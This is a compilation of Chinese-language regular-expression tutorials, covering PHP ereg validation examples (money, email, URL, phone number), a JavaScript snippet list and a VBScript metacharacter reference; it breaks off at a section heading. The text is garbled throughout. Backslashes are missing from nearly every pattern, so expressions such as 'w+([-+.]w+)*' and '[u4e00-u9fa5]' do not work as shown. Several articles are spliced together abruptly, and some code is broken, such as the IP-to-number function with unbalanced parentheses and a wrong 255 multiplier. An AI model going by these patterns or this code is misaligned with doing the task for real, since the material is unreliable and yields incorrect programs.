一个点('.')可以代表所有的单一字符,不包括"n"
如果,要匹配包括"n"在内的所有单个字符,怎么办?
对了,用'[n.]'这种模式.
"a.[0-9]": 一个a加一个字符再加一个0到9的数字
"^.{3}$": 三个任意字符结尾 .
中括号括住的内容只匹配一个单一的字符
"[ab]": 匹配单个的 a 或者 b ( 和 "a│b" 一样);
"[a-d]": 匹配'a' 到'd'的单个字符 (和"a│b│c│d" 还有 "[abcd]"效果一样); 一般我们都用[a-zA-Z]来指定字符为一个大小写英文
"^[a-zA-Z]": 匹配以大小写字母开头的字符串
"[0-9]%": 匹配含有 形如 x% 的字符串
",[a-zA-Z0-9]$": 匹配以逗号再加一个数字或字母结尾的字符串
你也可以把你不想要得字符列在中括号里,你只需要在总括号里面使用'^' 作为开头 "%[^a-zA-Z]%" 匹配含有两个百分号里面有一个非字母的字符串.
要点:^用在中括号开头的时候,就表示排除括号里的字符
为了PHP能够解释,你必须在这些字符面前后加'',并且将一些字符转义.
不要忘记在中括号里面的字符是这条规路的例外—在中括号里面, 所有的特殊字符,包括(''), 都将失去他们的特殊性质 "[*+?{}.]"匹配含有这些字符的字符串.
还有,正如regx的手册告诉我们: "如果列表里含有 ']', 最好把它作为列表里的第一个字符(可能跟在'^'后面). 如果含有'-', 最好把它放在最前面或者最后面, or 或者一个范围的第二个结束点[a-d-0-9]中间的‘-’将有效.
看了上面的例子,你对{n,m}应该理解了吧.要注意的是,n和m都不能为负整数,而且n总是小于m. 这样,才能 最少匹配n次且最多匹配m次. 如"p{1,5}"将匹配 "pvpppppp"中的前五个p
下面说说以开头的
b 书上说他是用来匹配一个单词边界,就是...比如'veb',可以匹配love里的ve而不匹配very里有ve
B 正好和上面的b相反.例子我就不举了
好,我们来做个应用:
如何构建一个模式来匹配 货币数量 的输入
构建一个匹配模式去检查输入的信息是否为一个表示money的数字。我们认为一个表示money的数量有四种方式: "10000.00" 和 "10,000.00",或者没有小数部分, "10000" and "10,000". 现在让我们开始构建这个匹配模式:
^[1-9][0-9]*$
这是所变量必须以非0的数字开头.但这也意味着 单一的 "0" 也不能通过测试. 以下是解决的方法:
^(0│[1-9][0-9]*)$
"只有0和不以0开头的数字与之匹配",我们也可以允许一个负号在数字之前:
^(0│-?[1-9][0-9]*)$
这就是: "0 或者 一个以0开头 且可能 有一个负号在前面的数字." 好了,现在让我们别那么严谨,允许以0开头.现在让我们放弃 负号 , 因为我们在表示钱币的时候并不需要用到. 我们现在指定 模式 用来匹配小数部分:
^[0-9]+(.[0-9]+)?$
这暗示匹配的字符串必须最少以一个阿拉伯数字开头. 但是注意,在上面模式中 "10." 是不匹配的, 只有 "10" 和 "10.2" 才可以. (你知道为什么吗)
^[0-9]+(.[0-9]{2})?$
我们上面指定小数点后面必须有两位小数.如果你认为这样太苛刻,你可以改成:
^[0-9]+(.[0-9]{1,2})?$
这将允许小数点后面有一到两个字符. 现在我们加上用来增加可读性的逗号(每隔三位), 我们可以这样表示:
^[0-9]{1,3}(,[0-9]{3})*(.[0-9]{1,2})?$
不要忘记 '+' 可以被 '*' 替代 如果你想允许空白字符串被输入话 (为什么?). 也不要忘记反斜杆 ’’ 在php字符串中可能会出现错误 (很普遍的错误).
现在,我们已经可以确认字符串了, 我们现在把所有逗号都去掉 str_replace(",", "", $money) 然后在把类型看成 double然后我们就可以通过他做数学计算了.
再来一个:
构造检查email的正则表达式
在一个完整的email地址中有三个部分:
1. 用户名 (在 '@' 左边的一切),
2.'@',
3. 服务器名(就是剩下那部分).
用户名可以含有大小写字母阿拉伯数字,句号 ('.'), 减号('-'), and 下划线 ('_'). 服务器名字也是符合这个规则,当然下划线除外.
现在, 用户名的开始和结束都不能是句点. 服务器也是这样. 还有你不能有两个连续的句点他们之间至少存在一个字符,好现在我们来看一下怎么为用户名写一个匹配模式:
^[_a-zA-Z0-9-]+$
现在还不能允许句号的存在. 我们把它加上:
^[_a-zA-Z0-9-]+(.[_a-zA-Z0-9-]+)*$
上面的意思就是说: "以至少一个规范字符(除了.)开头,后面跟着0个或者多个以点开始的字符串."
简单化一点, 我们可以用 eregi()取代 ereg().eregi()对大小写不敏感, 我们就不需要指定两个范围 "a-z" 和 "A-Z" – 只需要指定一个就可以了:
^[_a-z0-9-]+(.[_a-z0-9-]+)*$
后面的服务器名字也是一样,但要去掉下划线:
^[a-z0-9-]+(.[a-z0-9-]+)*$
好. 现在只需要用”@”把两部分连接:
^[_a-z0-9-]+(.[_a-z0-9-]+)*@[a-z0-9-]+(.[a-z0-9-]+)*$
这就是完整的email认证匹配模式了,只需要调用
eregi(‘^[_a-z0-9-]+(.[_a-z0-9-]+)*@[a-z0-9-]+(.[a-z0-9-]+)*$ ’,$eamil)
就可以得到是否为email了
正则表达式的其他用法
提取字符串
ereg() and eregi() 有一个特性是允许用户通过正则表达式去提取字符串的一部分(具体用法你可以阅读手册). 比如说,我们想从 path/URL 提取文件名 – 下面的代码就是你需要:
ereg("([^/]*)$", $pathOrUrl, $regs);
echo $regs[1];
高级的代换
ereg_replace() 和 eregi_replace()也是非常有用的: 假如我们想把所有的间隔负号都替换成逗号:
ereg_replace("[ nrt]+", ",", trim($str));
最后,我把另一串检查EMAIL的正则表达式让看文章的你来分析一下.
"^[-!#$%&'*+./0-9=?A-Z^_`a-z{|}~]+'.'@'.'[-!#$%&'*+/0-9=?A-Z^_`a-z{|}~]+.'.'[-!#$%&'*+./0-9=?A-Z^_`a-z{|}~]+$"
如果能方便的读懂,那这篇文章的目的就达到了.
让我们先来看看什么是正则表达式,为什么你要在PHP程序中用到它们。
什么是正则表达式?
你对从一个不错的老的基于控制的文本编辑器中分离出像BBEdit和notepad的程序,有什么看法呢?两个都支持文本输入,可以让你保存文本到文件中,但是现在的文本编辑器也支持其它功能,包括查找–代替工具,这让编辑一个文本文件相当容易。
正则表达式也是相似的,只是更好一些。正则表达式可以被认为一个极其高级的查找-替换工具,让我们从痛苦中摆脱出来:不必再写定制的数据确认例子来检查电子邮件地址或者来确认电话号码的格式是正确的,如此等等。
任何程序中最普通的函数之一就是数据有效性检查,PHP捆绑了一些文本检查函数,允许我们用正则表达式匹配一个字符串,确认有一个空格,有一个问号,等等。
你不知道的可能是,正则表达式可以简单装备吗,当你掌握了一些正则表达式时(这个正则表达式可以用来告诉正则表达式引擎一个字符串中我们想要匹配的部分),你会自问为什么会把正则表达式扔到角落里这么久,^_^。
PHP有两套函数,用来处理两种类型的正则表达式:Perl5兼容模式,和Posix标准兼容模式。在这篇文章中我们将看看ereg函数,用遵照 Posix标准的搜索表达式工作。虽然它们并没有Perl5模式那样强大,但是一种不错的学习正则表达式的方法。如果你对PHP支持的Perl5兼容正则 表达式感兴趣,可以到PHP.net网站找一些关于preg函数的细节。
PHP有六个函数来处理正则表达式,它们都把一个正则表达式作为它们的第一个参数,列出如下:
ereg: 最常用的正则表达式函数, ereg 允许我们搜索跟一个正则表达式匹配的一个字符串.
ereg_replace: 允许我们搜索跟正则表达式匹配的一个字符串,并用新的字符串代替所有这个表达式出现的地方。
eregi: 和ereg几乎是一样效果,不过忽略大小写。
eregi_replace: 和ereg_replace有着一样的搜索-替换功能,不过忽略大小写.
split: 允许我们搜索和正则表达式匹配的字符串,并且以字符串集合的方式返回匹配结果.
spliti: split函数忽略大小写的版本.
为什么使用正则表达式?
如果你不断地建立不同的函数来检查或者操作字符串的一部分,现在你可能要放弃所有的这些函数,取而代之的用正则表达式。如果你对下列的问题都答“是的”,那么你肯定要考虑使用正则表达式了:
你是否正在写一些定制的函数来检查表单数据(比如在电子信箱地址中的一个@,一个点)?
你是否写一些定制的函数,在一个字符串中循环每个字符,如果这个字符匹配了一个特定特征(比如它是大写的,或者它是一个空格),那么就替换它?
除了是令人不舒服的字符串检查和操作方法,如果没有有效率地写代码,上述的两条也会使你的程序慢下来。你是否更倾向于用下面的代码检查一个电子信箱地址呢:
<?php
function validateEmail($email)
{
$hasAtSymbol = strpos($email, "@");
$hasDot = strpos($email, ".");
if($hasAtSymbol && $hasDot)
return true;
else
return false;
}
echo validateEmail("mitchell@devarticles.com");
?>
...
或者使用下面的代码:
<?php
function validateEmail($email)
{
return ereg("^[a-zA-Z]+@[a-zA-Z]+.[a-zA-Z]+$", $email);
}
echo validateEmail("mitchell@devarticles.com");
?>
可以肯定的是,第一个函数比较容易,而且看起来结构也不错。但是如果我们用上面的下一个版本的email地址检查函数不是更容易吗?
上面展示的第二个函数只用了正则表达式,包括了对ereg函数的一个调用。Ereg 函数返回true或者false,来声明它的字符串参数是否和正则表达式相匹配。
很多编程者避开正则表达式,只因为它们(在一些情况下)比其它的文本处理方法更慢。正则表达式可能慢的原因是因为它们涉及把字符串在内存中拷贝和粘贴,因 为正则表达式的每一个新的部分都对应匹配一个字符串。但是,从我对正则表达式的经验来说,除非你在文本中几百个行运行一个复杂的正则表达式,否则性能上的 缺陷都可以忽略不计,当把正则表达式作为输入数据检查工具时,也很少出现这种情况。
正则表达式语法
在你可以匹配一个字符串到正则表达式之前,你必须先建立正则表达式。开始的时候,正则表达式的语法有点古怪,表达式中的每一个短语代表某个类型的搜索特征。下列是一些最普通的正则表达式,也都对应着一个如何使用它的例子:
字符串头部
搜索一个字符串的头部,用^,例如
<?php echo ereg("^hello", "hello world!"); ?>
将返回 true, 但是
<?php echo ereg("^hello", "i say hello world"); ?>
将返回 false, 因为hello不在字符串”I say hello world”的头部。
字符串尾部
搜索字符串尾部,用$,例如:
<?php echo ereg("bye$", "goodbye"); ?>
将返回true, 但是
<?php echo ereg("bye$", "goodbye my friend"); ?>
将返回 false,因为bye不在字符串”goodbye my friend”的尾部.
任意的单个字符
搜索任意字符,用点(.),例如:
<?php echo ereg(".", "cat"); ?>
将返回true,但是
<?php echo ereg(".", ""); ?>
将返回false,因为我们的要搜索字符串没有包含字符。你可以用花括号随意告诉正则表达式引擎它要匹配多少个单个字符。如果我只想匹配5个字符,我可以这样用ereg:
<?php echo ereg(".{5}$", "12345"); ?>
上面的这段代码告诉正则表达式引擎当且仅当至少5个连续的字符出现字符串的尾部时返回true.我们也可以限制连续出现的字符的数目:
<?php echo ereg("a{1,3}$", "aaa"); ?>
在上面的例子里,我们已经告诉正则表达式引擎,我们的搜索字符串来匹配表达式,它在尾部必须有介于1和3个的”a”字符。
<?php echo ereg("a{1,3}$", "aaab"); ?>
上面的例子将不会返回true,虽然有三个”a”字符在搜索字符串里,但是它们不是在字符串的尾部。如果我们把结尾字符串匹配$从正则表达式中去掉,那么这个字符串是匹配的。
我们也可以告诉正则表达式引擎来匹配至少有确定数目的字符在一行,如果它们存在的,可以匹配更多。 我们可以这样做:
<?php echo ereg("a{3,}$", "aaaa"); ?>
零或多次重复字符
为了告诉正则表达式引擎一个字符可能存在,也可以重复,我们用*字符。这里的两个例子都将返回true.
<?php echo ereg("t*", "tom"); ?>
<?php echo ereg("t*", "fom"); ?>
即使第二个例子不包含”t”这个字符,但仍旧返回ture,因为*表示字符可以出现,但不是必须出现。事实上,任何普通的字符串模式都会使上面的ereg调用返回true,因为’t’字符是可选的.
一或多次重复字符
为了告诉正则表达式引擎一个字符必须存在,也可以重复不止一次,我们用+字符,像
<?php echo ereg("z+", "i like the zoo"); ?>
下面的例子也会返回true:
<?php echo ereg("z+", "i like the zzzzzzoo!"); ?>
零或一次重复字符
我们也可以告诉正则表达式引擎,一个字符必须是或者只存在一次,或者没有。我们用?字符来做这项工作,就像
<?php echo ereg("c?", "cats are fuzzy"); ?>
如果我们愿意,我们完全可以从上面的搜索字符串中删除’c’,这个表达式会仍旧返回true.’?’ 的意思是一个’c’可以出现在搜索字符串的任何地方,但不是必须的。
正则表达式语法 (续)
空格字符
为了匹配一个搜索字符串中的空格字符,我们用预定义Posix的类,[[:space]].方括号标明连续字符的相关性,”:space:”是实际要匹配 的类(在这种情形下,是任何空白字符)。空白包括tab字符,新行字符,空白字符。或者,如果搜索字符串必须包含只有一个空格,而不是一个tab或者新行 字符,你可以用一个空格字符(" ")。在大多数情况下,我倾向于使用":space:",因为这意味着我的意图不仅仅是单个空格字符,这点很容易被忽视。这里有一些Posix-标准预定 义类,
有一些我们可以作为正则表达式的部分的一些Posix-标准预定义类,包括[:alnum:], [:digit:], [:lower:]等等。 完整的列表可以在这里查看
我们可以像这样匹配单个空白字符:
<?php echo ereg("Mitchell[[:space:]]Harper", "Mitchell Harper"); ?>
我们也可以通过在表达式后用?字符来告诉正则表达式引擎匹配没有空白或者一个空白。
<?php echo ereg("Mitchell[[:space:]]?Harper", "MitchellHarper"); ?>
模式分组
相关的模式可以在方括号里分在一起。很容易用[a-z]和[A-Z]指定只有一个小写字母或者一列大写字母以搜索字符串的一部分存在。
<?php
// 要求从第一个到最后一个都是小写字母
echo ereg("^[a-z]+$", "johndoe"); // 返回true
?>
或者像
<?php
// 要求从第一个到最后一个都是大写字母
ereg("^[A-Z]+$", "JOHNDOE"); // 返回 true?
?>
我们也可以告诉正则表达式引擎,我们希望或者是小写字母,或者是大写字母。我们只要把[a-z]和[A-Z]模式结合在一起就可以做到。
<?php echo ereg("^[a-zA-Z]+$", "JohnDoe"); ?>
在上面的例子里,如果我们能匹配"John Doe",而不是"JohnDoe",将是非常有意义的。我们用下面的正则表达式来做这个:
^[a-zA-Z]+[[:space:]]{1}[a-zA-Z]+$
很容易搜索一个数字字符串
<?php echo ereg("^[0-9]+$", "12345"); ?>
词语分组
不仅仅搜索模式可以分组,我们也可以用圆括号把相关的搜索词语进行分组。
<?php echo ereg("^(John|Jane).+$", "John Doe"); ?>
在上面的例子中,我们有一个字符串头部字符,紧跟着"John"或者"Jane",至少有一个其它字符,然后一个字符串尾部字符。所以…
<?php echo ereg("^(John|Jane).+$", "Jane Doe"); ?>
...将也匹配我们的搜索模式
特殊字符的情形
因为一些字符要用在一个搜索模式的明确分组或者语法上,像在(John|Jane)中的圆括号,我们需要告诉正则表达式引擎来屏蔽这些字符,加工它们使之 成为被搜索字符串的一部分,而不是搜索表达式的一部分。我们所用的方法称为“字符转义”,涉及到将任何“专用符号”加上反斜杠。所以,例如,如果我想在我 的搜索中包含’|’,那么我就可以这样做
<?php echo ereg("^[a-zA-z]+|[a-zA-z]+$", "John|Jane"); ?>
这里只是少量的一些你要转义的字符,你必须转义^, $, (, ), ., [, |, *, ?, +, and { 。
希望你现在对正则表达式实际上有多么强大有了一点点感觉了。现在让我们看两个用正则表达式来检查数据中一个字符串的例子。
正则表达式例子
例子1
让我们把第一个例子做的相当简单,检验一个标准的URL.一个标准的URL(没有端口号),有三个部分构成:
[协议]://[域名]
让我们从匹配URL的协议部分开始,并且让它只能用http或者ftp.我们可以用下面的正则表达式做到这点:
^(http|ftp)
^字符特指字符串的头部,利用圆括号把http和ftp围住,且用“或者”符号(|)将它们分开,我们告诉正则表达式引擎http和ftp两者之一必须在字符串的开头。
一个域名通常由www.somesite.com构成,但是可以随意选择要不要www部分。为了例子简单,我们只允许.com,.net,和.org的域名是在考虑之中的。我们最好这样对正则表达式中的域名部分表示如下:
(www.)?.+.(com|net|org)$
把所有的东西放在一起,我们的正则表达式就可以用作检查一个域名,如:
<?php
function isValidDomain($domainName)
{
return ereg("^(http|ftp)://(www.)?.+.(com|net|org)$", $domainName);
}
//真(true)
echo isValidDomain("http://www.somesite.com");
//真(true)
echo isValidDomain("ftp://somesite.com");
//假 (false)
echo isValidDomain("ftp://www.somesite.fr");
//假 (false)
echo isValidDomain("www.somesite.com");
?>
例子二
因为我居住在澳大利亚悉尼,让我们检查一个典型的澳大利亚国际电话号码。澳大利亚国际电话号码的格式如下:
+61x xxxx-xxxx
第一个x是区号,其它的都是电话号码。检查以'+61'开头且紧跟一个在2到9之间的区号的电话号码,我们用下面的正则表达式:
^+61[2-9][[:space:]]
注意,上面的搜索模式把'+'字符用''转义,以便于可以在搜索中包含,不至于被解释为一个正则表达式。[2-9]告诉正则表达式引擎我们需要包含一个2到9之间的数字。[[:space:]]类则告诉正则表达式期望在这里有一个空白。
这里是电话号码剩下的搜索模式:
[0-9]{4}-[0-9]{4}$
这里没有什么不寻常的地方,我们只是告诉正则表达式引擎电话号码可用的数字,它必须是4个数字的组合,跟着一个连接符,再跟着另一个4个数字的组合,然后一个字符串尾部字符。
把完整的正则表达式放在一起,放进一个函数,我们可以用代码来检查一些澳大利亚国际电话号码:
<?php
function isValidPhone($phoneNum)
{
echo ereg("^+61[2-9][[:space:]][0-9]{4}-[0-9]{4}$", $phoneNum);
}
// 真(true)
echo isValidPhone("+619 0000-0000");
// 假(false)
echo isValidPhone("+61 00000000");
//假( false)
echo isValidPhone("+611 00000000");
?>
总结
正则表达式用一些不适合书写和重复的代码来检查一个字符串。在最后的几页里,我们已经讲解了所有的Posix标准正则表达式的基础,包括字符,分组和PHP ereg函数。我们也知道了怎么用正则表达式来检查一些PHP中简单的字符串。
译者注释:本人英文不怎么好,可能一些地方有出入。本文中的字符类其实是我们所说的字符簇
经典正则表达式
正则表达式用于字符串处理,表单验证等场合,实用高效,但用到时总是不太把握,以致往往要上网查一番。我将一些常用的表达式收藏在这里,作备忘之用。本贴随时会更新。
匹配中文字符的正则表达式: [u4e00-u9fa5]
匹配双字节字符(包括汉字在内):[^x00-xff]
应用:计算字符串的长度(一个双字节字符长度计2,ASCII字符计1)
String.prototype.len=function(){return this.replace([^x00-xff]/g,"aa").length;}
匹配空行的正则表达式:n[s| ]*r
匹配HTML标记的正则表达式:/<(.*)>.*</1>|<(.*) />/
匹配首尾空格的正则表达式:(^s*)|(s*$)
应用:javascript中没有像vbscript那样的trim函数,我们就可以利用这个表达式来实现,如下:
String.prototype.trim = function()
{
return this.replace(/(^s*)|(s*$)/g, "");
}
利用正则表达式分解和转换IP地址:
下面是利用正则表达式匹配IP地址,并将IP地址转换成对应数值的Javascript程序:
function IP2V(ip)
{
re=/(d+).(d+).(d+).(d+)/g //匹配IP地址的正则表达式
if(re.test(ip))
{
return RegExp.$1*Math.pow(255,3))+RegExp.$2*Math.pow(255,2))+RegExp.$3*255+RegExp.$4*1
}
else
{
throw new Error("Not a valid IP address!")
}
}
不过上面的程序如果不用正则表达式,而直接用split函数来分解可能更简单,程序如下:
var ip="10.100.20.168"
ip=ip.split(".")
alert("IP值是:"+(ip[0]*255*255*255+ip[1]*255*255+ip[2]*255+ip[3]*1))
匹配Email地址的正则表达式:w+([-+.]w+)*@w+([-.]w+)*.w+([-.]w+)*
匹配网址URL的正则表达式:http://([w-]+.)+[w-]+(/[w- ./?%&=]*)?
利用正则表达式去除字串中重复的字符的算法程序:
var s="abacabefgeeii"
var s1=s.replace(/(.).*1/g,"$1")
var re=new RegExp("["+s1+"]","g")
var s2=s.replace(re,"")
alert(s1+s2) //结果为:abcefgi
我原来在CSDN上发贴寻求一个表达式来实现去除重复字符的方法,最终没有找到,这是我能想到的最简单的实现方法。思路是使用后向引用取出包括重复的字符,再以重复的字符建立第二个表达式,取到不重复的字符,两者串连。这个方法对于字符顺序有要求的字符串可能不适用。
得用正则表达式从URL地址中提取文件名的javascript程序,如下结果为page1
s="http://www.9499.net/page1.htm"
s=s.replace(/(.*/){0,}([^.]+).*/ig,"$2")
alert(s)
利用正则表达式限制网页表单里的文本框输入内容:
用正则表达式限制只能输入中文:onkeyup="value=value.replace(/[^u4E00-u9FA5]/g,'')" onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[^u4E00-u9FA5]/g,''))"
用正则表达式限制只能输入全角字符: onkeyup="value=value.replace(/[^uFF00-uFFFF]/g,'')" onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[^uFF00-uFFFF]/g,''))"
用正则表达式限制只能输入数字:onkeyup="value=value.replace(/[^d]/g,'') "onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[^d]/g,''))"
用正则表达式限制只能输入数字和英文:onkeyup="value=value.replace(/[W]/g,'') "onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[^d]/g,''))"
如何用正则表达式来表示中文
由于中文的ASCII码是有一定的范围的。所以你可以用下面的正则表达式来表示中文。
/^[chr(0xa1)-chr(0xff)]+$/
下面是一个使用的例子:
$str = "超越PHP";
if (preg_match("/^[".chr(0xa1)."-".chr(0xff)."]+$/", $str)) {
echo "这是一个纯中文字符串";
} else {
echo "这不是一个纯中文字串";
}
正则表达式
如果原来没有使用过正则表达式,那么可能对这个术语和概念会不太熟悉。不过,它们并不是您想象的那么新奇。
请回想一下在硬盘上是如何查找文件的。您肯定会使用 ? 和 * 字符来帮助查找您正寻找的文件。? 字符匹配文件名中的单个字符,而 * 则匹配一个或多个字符。一个如 'data?.dat' 的模式可以找到下述文件:
data1.dat
data2.dat
datax.dat
dataN.dat
如果使用 * 字符代替 ? 字符,则将扩大找到的文件数量。'data*.dat' 可以匹配下述所有文件名:
data.dat
data1.dat
data2.dat
data12.dat
datax.dat
dataXYZ.dat
尽管这种搜索文件的方法肯定很有用,但也十分有限。? 和 * 通配符的有限能力可以使你对正则表达式能做什么有一个概念,不过正则表达式的功能更强大,也更灵活。
--------------------------------------------------------------------------------
2
早期起源
正则表达式的“祖先”可以一直上溯至对人类神经系统如何工作的早期研究。Warren McCulloch 和 Walter Pitts 这两位神经生理学家研究出一种数学方式来描述这些神经网络。
1956 年, 一位叫 Stephen Kleene 的美国数学家在 McCulloch 和 Pitts 早期工作的基础上,发表了一篇标题为“神经网事件的表示法”的论文,引入了正则表达式的概念。正则表达式就是用来描述他称为“正则集的代数”的表达式,因 此采用“正则表达式”这个术语。
随后,发现可以将这一工作应用于使用Ken Thompson 的计算搜索算法的一些早期研究,Ken Thompson是Unix 的主要发明人。正则表达式的第一个实用应用程序就是 Unix 中的qed 编辑器。
如他们所说,剩下的就是众所周知的历史了。从那时起直至现在正则表达式都是基于文本的编辑器和搜索工具中的一个重要部分。
--------------------------------------------------------------------------------
3.
使用正则表达式
在典型的搜索和替换操作中,必须提供要查找的确切文字。这种技术对于静态文本中的简单搜索和替换任务可能足够了,但是由于它缺乏灵活性,因此在搜索动态文本时就有困难了,甚至是不可能的。
使用正则表达式,就可以:
测试字符串的某个模式。例如,可以对一个输入字符串进行测试,看在该字符串是否存在一个电话号码模式或一个信用卡号码模式。这称为数据有效性验证。
替换文本。可以在文档中使用一个正则表达式来标识特定文字,然后可以全部将其删除,或者替换为别的文字。
根据模式匹配从字符串中提取一个子字符串。可以用来在文本或输入字段中查找特定文字。
例如,如果需要搜索整个 web 站点来删除某些过时的材料并替换某些HTML 格式化标记,则可以使用正则表达式对每个文件进行测试,看在该文件中是否存在所要查找的材料或 HTML 格式化标记。用这个方法,就可以将受影响的文件范围缩小到包含要删除或更改的材料的那些文件。然后可以使用正则表达式来删除过时的材料,最后,可以再次使 用正则表达式来查找并替换那些需要替换的标记。
另一个说明正则表达式非常有用的示例是一种其字符串处理能力还不为人所知的语言。VBScript 是 Visual Basic 的一个子集,具有丰富的字符串处理功能。与 C 类似的 Visual Basic Scripting Edition 则没有这一能力。正则表达式给 Visual Basic Scripting Edition 的字符串处理能力带来了明显改善。不过,可能还是在 VBScript 中使用正则表达式的效率更高,它允许在单个表达式中执行多个字符串操作。
--------------------------------------------------------------------------------
正则表达式语法
一个正则表达式就是由普通字符(例如字符 a 到 z)以及特殊字符(称为元字符)组成的文字模式。该模式描述在查找文字主体时待匹配的一个或多个字符串。正则表达式作为一个模板,将某个字符模式与所搜索的字符串进行匹配。
这里有一些可能会遇到的正则表达式示例:
Visual Basic Scripting Edition VBScript 匹配
/^[ t]*$/ "^[ t]*$" 匹配一个空白行。
/d{2}-d{5}/ "d{2}-d{5}" 验证一个ID 号码是否由一个2位数字,一个连字符以及一个5位数字组成。
/<(.*)>.*</1>/ "<(.*)>.*</1>" 匹配一个 HTML 标记。
下表是元字符及其在正则表达式上下文中的行为的一个完整列表:
字符 描述
将下一个字符标记为一个特殊字符、或一个原义字符、或一个 后向引用、或一个八进制转义符。例如,'n' 匹配字符 "n"。'n' 匹配一个换行符。序列 '' 匹配 "" 而 "(" 则匹配 "("。
^ 匹配输入字符串的开始位置。如果设置了 RegExp 对象的 Multiline 属性,^ 也匹配 'n' 或 'r' 之后的位置。
$ 匹配输入字符串的结束位置。如果设置了RegExp 对象的 Multiline 属性,$ 也匹配 'n' 或 'r' 之前的位置。
* 匹配前面的子表达式零次或多次。例如,zo* 能匹配 "z" 以及 "zoo"。 * 等价于{0,}。
+ 匹配前面的子表达式一次或多次。例如,'zo+' 能匹配 "zo" 以及 "zoo",但不能匹配 "z"。+ 等价于 {1,}。
? 匹配前面的子表达式零次或一次。例如,"do(es)?" 可以匹配 "do" 或 "does" 中的"do" 。? 等价于 {0,1}。
{n} n 是一个非负整数。匹配确定的 n 次。例如,'o{2}' 不能匹配 "Bob" 中的 'o',但是能匹配 "food" 中的两个 o。
{n,} n 是一个非负整数。至少匹配n 次。例如,'o{2,}' 不能匹配 "Bob" 中的 'o',但能匹配 "foooood" 中的所有 o。'o{1,}' 等价于 'o+'。'o{0,}' 则等价于 'o*'。
{n,m} m 和 n 均为非负整数,其中n <= m。最少匹配 n 次且最多匹配 m 次。刘, "o{1,3}" 将匹配 "fooooood" 中的前三个 o。'o{0,1}' 等价于 'o?'。请注意在逗号和两个数之间不能有空格。
? 当该字符紧跟在任何一个其他限制符 (*, +, ?, {n}, {n,}, {n,m}) 后面时,匹配模式是非贪婪的。非贪婪模式尽可能少的匹配所搜索的字符串,而默认的贪婪模式则尽可能多的匹配所搜索的字符串。例如,对于字符串 "oooo",'o+?' 将匹配单个 "o",而 'o+' 将匹配所有 'o'。
. 匹配除 "n" 之外的任何单个字符。要匹配包括 'n' 在内的任何字符,请使用象 '[.n]' 的模式。
(pattern) 匹配pattern 并获取这一匹配。所获取的匹配可以从产生的 Matches 集合得到,在VBScript 中使用 SubMatches 集合,在Visual Basic Scripting Edition 中则使用 $0…$9 属性。要匹配圆括号字符,请使用 '(' 或 ')'。
(?:pattern) 匹配 pattern 但不获取匹配结果,也就是说这是一个非获取匹配,不进行存储供以后使用。这在使用 "或" 字符 (|) 来组合一个模式的各个部分是很有用。例如, 'industr(?:y|ies) 就是一个比 'industry|industries' 更简略的表达式。
(?=pattern) 正向预查,在任何匹配 pattern 的字符串开始处匹配查找字符串。这是一个非获取匹配,也就是说,该匹配不需要获取供以后使用。例如, 'Windows (?=95|98|NT|2000)' 能匹配 "Windows 2000" 中的 "Windows" ,但不能匹配 "Windows 3.1" 中的 "Windows"。预查不消耗字符,也就是说,在一个匹配发生后,在最后一次匹配之后立即开始下一次匹配的搜索,而不是从包含预查的字符之后开始。
(?!pattern) 负向预查,在任何不匹配Negative lookahead matches the search string at any point where a string not matching pattern 的字符串开始处匹配查找字符串。这是一个非获取匹配,也就是说,该匹配不需要获取供以后使用。例如'Windows (?!95|98|NT|2000)' 能匹配 "Windows 3.1" 中的 "Windows",但不能匹配 "Windows 2000" 中的 "Windows"。预查不消耗字符,也就是说,在一个匹配发生后,在最后一次匹配之后立即开始下一次匹配的搜索,而不是从包含预查的字符之后开始
x|y 匹配 x 或 y。例如,'z|food' 能匹配 "z" 或 "food"。'(z|f)ood' 则匹配 "zood" 或 "food"。
[xyz] 字符集合。匹配所包含的任意一个字符。例如, '[abc]' 可以匹配 "plain" 中的 'a'。
[^xyz] 负值字符集合。匹配未包含的任意字符。例如, '[^abc]' 可以匹配 "plain" 中的'p'。
[a-z] 字符范围。匹配指定范围内的任意字符。例如,'[a-z]' 可以匹配 'a' 到 'z' 范围内的任意小写字母字符。
[^a-z] 负值字符范围。匹配任何不在指定范围内的任意字符。例如,'[^a-z]' 可以匹配任何不在 'a' 到 'z' 范围内的任意字符。
b 匹配一个单词边界,也就是指单词和空格间的位置。例如, 'erb' 可以匹配"never" 中的 'er',但不能匹配 "verb" 中的 'er'。
B 匹配非单词边界。'erB' 能匹配 "verb" 中的 'er',但不能匹配 "never" 中的 'er'。
cx 匹配由x指明的控制字符。例如, cM 匹配一个 Control-M 或回车符。 x 的值必须为 A-Z 或 a-z 之一。否则,将 c 视为一个原义的 'c' 字符。
d 匹配一个数字字符。等价于 [0-9]。
D 匹配一个非数字字符。等价于 [^0-9]。
f 匹配一个换页符。等价于 x0c 和 cL。
n 匹配一个换行符。等价于 x0a 和 cJ。
r 匹配一个回车符。等价于 x0d 和 cM。
s 匹配任何空白字符,包括空格、制表符、换页符等等。等价于 [ fnrtv]。
S 匹配任何非空白字符。等价于 [^ fnrtv]。
t 匹配一个制表符。等价于 x09 和 cI。
v 匹配一个垂直制表符。等价于 x0b 和 cK。
w 匹配包括下划线的任何单词字符。等价于'[A-Za-z0-9_]'。
W 匹配任何非单词字符。等价于 '[^A-Za-z0-9_]'。
xn 匹配 n,其中 n 为十六进制转义值。十六进制转义值必须为确定的两个数字长。例如, 'x41' 匹配 "A"。'x041' 则等价于 'x04' & "1"。正则表达式中可以使用 ASCII 编码。.
num 匹配 num,其中 num 是一个正整数。对所获取的匹配的引用。例如,'(.)1' 匹配两个连续的相同字符。
n 标识一个八进制转义值或一个后向引用。如果 n 之前至少 n 个获取的子表达式,则 n 为后向引用。否则,如果 n 为八进制数字 (0-7),则 n 为一个八进制转义值。
nm 标识一个八进制转义值或一个后向引用。如果 nm 之前至少有is preceded by at least nm 个获取得子表达式,则 nm 为后向引用。如果 nm 之前至少有 n 个获取,则 n 为一个后跟文字 m 的后向引用。如果前面的条件都不满足,若 n 和 m 均为八进制数字 (0-7),则 nm 将匹配八进制转义值 nm。
nml 如果 n 为八进制数字 (0-3),且 m 和 l 均为八进制数字 (0-7),则匹配八进制转义值 nml。
un 匹配 n,其中 n 是一个用四个十六进制数字表示的 Unicode 字符。例如, u00A9 匹配版权符号 (?)。
4.
建立正则表达式
